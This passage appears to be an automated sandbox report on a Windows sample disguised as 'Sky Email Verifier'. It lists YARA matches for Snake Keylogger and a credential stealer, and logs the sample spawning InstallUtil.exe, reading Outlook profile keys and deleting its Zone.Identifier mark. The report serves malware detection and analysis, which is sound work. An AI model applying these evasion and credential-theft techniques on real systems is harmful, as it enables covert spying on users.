                    Source: 5qJ6QQTcRS.exe, 00000000.00000000.1287883325.0000000000DBC000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSky Email Verifier.exeF vs 5qJ6QQTcRS.exe
                    Source: 5qJ6QQTcRS.exeBinary or memory string: OriginalFilenameSky Email Verifier.exeF vs 5qJ6QQTcRS.exe
                    Source: 5qJ6QQTcRS.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 4.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 4.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 4.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 0.2.5qJ6QQTcRS.exe.3a2f6d0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.5qJ6QQTcRS.exe.3a2f6d0.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.5qJ6QQTcRS.exe.3a2f6d0.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 0.2.5qJ6QQTcRS.exe.3a2f6d0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.5qJ6QQTcRS.exe.3a2f6d0.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 00000004.00000002.2542240293.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 00000000.00000002.1970037242.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 00000000.00000002.1970037242.0000000003A2F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: Process Memory Space: 5qJ6QQTcRS.exe PID: 8140, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: Process Memory Space: InstallUtil.exe PID: 8132, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/1@3/3
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\5qJ6QQTcRS.exe.logJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMutant created: NULL
                    Source: 5qJ6QQTcRS.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 5qJ6QQTcRS.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: 5qJ6QQTcRS.exeReversingLabs: Detection: 75%
                    Source: 5qJ6QQTcRS.exeVirustotal: Detection: 67%
                    Source: unknownProcess created: C:\Users\user\Desktop\5qJ6QQTcRS.exe "C:\Users\user\Desktop\5qJ6QQTcRS.exe"
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: 5qJ6QQTcRS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: 5qJ6QQTcRS.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                    Data Obfuscation

                    barindex
                    Source: Yara matchFile source: 0.2.5qJ6QQTcRS.exe.3b01960.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.5qJ6QQTcRS.exe.3ab6d70.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.5qJ6QQTcRS.exe.5b60000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.5qJ6QQTcRS.exe.5b60000.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.5qJ6QQTcRS.exe.3b01960.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.5qJ6QQTcRS.exe.3ab6d70.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.5qJ6QQTcRS.exe.3a2f6d0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.1971799166.0000000005B60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1970037242.0000000003A2F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1965003803.00000000029A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: 5qJ6QQTcRS.exe PID: 8140, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeCode function: 0_2_06129378 push esp; iretd 0_2_06129379
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeCode function: 0_2_06127F80 pushfd ; ret 0_2_06127F89
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeCode function: 0_2_07574B80 pushfd ; retf 0_2_07574B81
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeCode function: 0_2_0757B105 push ebp; iretd 0_2_0757B106
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeCode function: 0_2_07692A46 push 00000033h; ret 0_2_07692A48
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeCode function: 0_2_0769EAC0 pushfd ; retf 0_2_0769EAC1
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeCode function: 0_2_07691153 push E8FFFFFDh; iretd 0_2_0769115D
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeCode function: 0_2_076929A6 push 00000033h; ret 0_2_076929A8
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeCode function: 0_2_07697D83 push ebx; retf 0_2_07697D84
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeCode function: 0_2_07F511B8 push FFFFFF8Bh; iretd 0_2_07F511BA
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00F89C30 push esp; retf 00FCh4_2_00F89D55
                    Source: 5qJ6QQTcRS.exeStatic PE information: section name: .text entropy: 7.081769071361407

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeFile opened: C:\Users\user\Desktop\5qJ6QQTcRS.exe\:Zone.Identifier read attributes | deleteJump to behavior
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\5qJ6QQTcRS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
